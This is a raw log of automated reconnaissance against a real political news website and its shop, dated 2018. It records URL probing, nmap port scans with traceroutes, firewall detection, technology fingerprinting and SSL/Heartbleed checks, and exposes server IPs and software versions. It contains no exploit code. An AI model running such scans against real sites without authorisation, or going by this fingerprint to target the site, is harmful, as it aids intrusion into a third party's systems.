- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 37 / 100 ]-[00:23:11] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/ksm/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 38 / 100 ]-[00:23:13] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/senate/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 39 / 100 ]-[00:23:15] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/dapl/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 40 / 100 ]-[00:23:17] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/fbi/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 41 / 100 ]-[00:23:19] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/bush/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 42 / 100 ]-[00:23:21] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/espionage/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 43 / 100 ]-[00:23:23] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/twitter/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 44 / 100 ]-[00:23:25] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/911/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 45 / 100 ]-[00:23:27] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/leftists/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 46 / 100 ]-[00:23:29] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/buttons/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 47 / 100 ]-[00:23:31] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/hollywood/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 48 / 100 ]-[00:23:33] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/hot/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 49 / 100 ]-[00:23:35] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/oscars/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 50 / 100 ]-[00:23:37] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/trending/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 51 / 100 ]-[00:23:38] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/popular/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 52 / 100 ]-[00:23:40] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/cart/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 53 / 100 ]-[00:23:42] [ - ]
- |_[ + ] Target:: [ https://shop.theredelephants.com/collections/tees ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 54 / 100 ]-[00:23:45] [ - ]
- |_[ + ] Target:: [ https://shop.theredelephants.com/collections/men ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 55 / 100 ]-[00:23:47] [ - ]
- |_[ + ] Target:: [ https://shop.theredelephants.com/products/fascists ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 56 / 100 ]-[00:23:49] [ - ]
- |_[ + ] Target:: [ https://shop.theredelephants.com/collections/crew ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 57 / 100 ]-[00:23:51] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/2077-2/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 58 / 100 ]-[00:23:53] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/harvard-university/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 59 / 100 ]-[00:23:56] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/marie-antrumpette/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 60 / 100 ]-[00:23:58] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/2877-2/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 61 / 100 ]-[00:24:00] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/mainstream-media/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 62 / 100 ]-[00:24:02] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/1st-ammendment/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 63 / 100 ]-[00:24:04] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/political-correctness/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 64 / 100 ]-[00:24:06] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/antigun-california/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 65 / 100 ]-[00:24:08] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/1994-2/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 66 / 100 ]-[00:24:10] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/government-agencies/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 67 / 100 ]-[00:24:12] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/author/windycityfan/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 68 / 100 ]-[00:24:14] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/election/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 69 / 100 ]-[00:24:16] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/electoral-college/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 70 / 100 ]-[00:24:18] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/trumps-cabinet/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 71 / 100 ]-[00:24:20] [ - ]
- |_[ + ] Target:: [ https://shop.theredelephants.com/products/communism-kills ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 72 / 100 ]-[00:24:22] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/womens-march/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 73 / 100 ]-[00:24:24] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/riots/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 74 / 100 ]-[00:24:26] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/1261-2/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 75 / 100 ]-[00:24:28] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/foreign-policy/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 76 / 100 ]-[00:24:30] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/white-house/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 77 / 100 ]-[00:24:32] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/sjw/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 78 / 100 ]-[00:24:34] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/iraq-war/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 79 / 100 ]-[00:24:36] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/viral-videos/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 80 / 100 ]-[00:24:38] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/bernie-sanders/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 81 / 100 ]-[00:24:39] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/episodes-page/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 403 Forbidden, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 82 / 100 ]-[00:24:41] [ - ]
- |_[ + ] Target:: [ https://shop.theredelephants.com/pages/sizing-returns ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:23.227.38.32:443
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 83 / 100 ]-[00:24:43] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/meme/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 84 / 100 ]-[00:24:45] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/commifornia/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 85 / 100 ]-[00:24:47] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/creep/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 86 / 100 ]-[00:24:49] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/violence/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 87 / 100 ]-[00:24:51] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/my-account/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 88 / 100 ]-[00:24:53] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/progressives/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 89 / 100 ]-[00:24:55] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/oathkeepers/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 90 / 100 ]-[00:24:57] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/bannon/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 91 / 100 ]-[00:24:58] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/4chan/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 92 / 100 ]-[00:25:00] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/titanpointe/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 93 / 100 ]-[00:25:02] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/att/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 94 / 100 ]-[00:25:04] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/republican/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 95 / 100 ]-[00:25:06] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/moar/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 96 / 100 ]-[00:25:08] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/oabamcare/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 97 / 100 ]-[00:25:10] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/blm/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 98 / 100 ]-[00:25:12] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/contact-2/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- _[ - ]::--------------------------------------------------------------------------------------------------------------
- |_[ + ] [ 99 / 100 ]-[00:25:14] [ - ]
- |_[ + ] Target:: [ http://theredelephants.com/tag/reddit/ ]
- |_[ + ] Exploit::
- |_[ + ] Information Server:: HTTP/1.1 200 OK, , IP:104.196.67.80:80
- |_[ + ] More details:: / - / , ISP:
- |_[ + ] Found:: UNIDENTIFIED
- [ INFO ] [ Shutting down ]
- [ INFO ] [ End of process INURLBR at [08-11-2018 00:25:14]
- [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
- [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/plugins/slurp/output/inurlbr-theredelephants.com.txt ]
- |_________________________________________________________________________________________
- \_________________________________________________________________________________________/
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:25 EST
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.21s latency).
- PORT STATE SERVICE VERSION
- 123/udp open|filtered ntp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 118.92 ms 10.245.200.1
- 2 121.08 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
- 3 119.72 ms 195.42.145.65
- 4 135.04 ms 108.170.244.240
- 5 127.40 ms 72.14.238.53
- 6 199.91 ms 216.239.54.84
- 7 210.90 ms 209.85.255.252
- 8 210.93 ms 216.239.41.232
- 9 ... 17
- 18 213.57 ms 104.196.67.80
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-08 00:27 EST
- Nmap scan report for theredelephants.com (104.196.67.80)
- Host is up (0.17s latency).
- PORT STATE SERVICE VERSION
- 161/tcp filtered snmp
- 161/udp open|filtered snmp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 119.34 ms 10.245.200.1
- 2 119.37 ms 185.94.189.129
- 3 120.14 ms 195.42.145.65
- 4 127.80 ms 108.170.244.240
- 5 127.84 ms 209.85.251.179
- 6 200.27 ms 216.239.54.150
- 7 211.79 ms 209.85.255.244
- 8 211.07 ms 72.14.239.185
- 9 ... 17
- 18 212.06 ms 104.196.67.80
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://theredelephants.com
- #######################################################################################################################################
- https://theredelephants.com [200 OK] Country[UNITED STATES][US], Email[contact@theredelephants.com], HTTPServer[nginx], IP[104.196.67.80], JQuery[1.12.4], MetaGenerator[Powered by WPBakery Page Builder - drag and drop page builder for WordPress.], Open-Graph-Protocol[article], PoweredBy[WPBakery], Script[application/ld+json,text/javascript], Title[Home - The Red Elephants], UncommonHeaders[link,wpe-backend,x-cacheable,x-pass-why,x-cache-group,x-type], WordPress, nginx
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginChromeSha1Deprecation
- PluginSessionResumption
- PluginSessionRenegotiation
- PluginCompression
- PluginHSTS
- PluginOpenSSLCipherSuites
- PluginHeartbleed
- PluginCertInfo
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- theredelephants.com:443 => 104.196.67.80:443
- SCAN RESULTS FOR THEREDELEPHANTS.COM:443 - 104.196.67.80:443
- ------------------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: 0707f8a55c34596e0f7f1eabf202d40d9f0505cd
- Common Name: *.wpengine.com
- Issuer: RapidSSL RSA CA 2018
- Serial Number: 050E0BC8753CB966CCD109DFB99C23B2
- Not Before: Feb 1 00:00:00 2018 GMT
- Not After: Jul 20 12:00:00 2019 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['*.wpengine.com', 'wpengine.com']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match theredelephants.com
- Google CA Store (09/2015): OK - Certificate is trusted
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Certificate Chain Received: ['*.wpengine.com', 'RapidSSL RSA CA 2018', 'DigiCert Global Root CA']
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 4.65 S
- ------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 104.196.67.80
- Testing SSL server theredelephants.com on port 443 using SNI name theredelephants.com
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
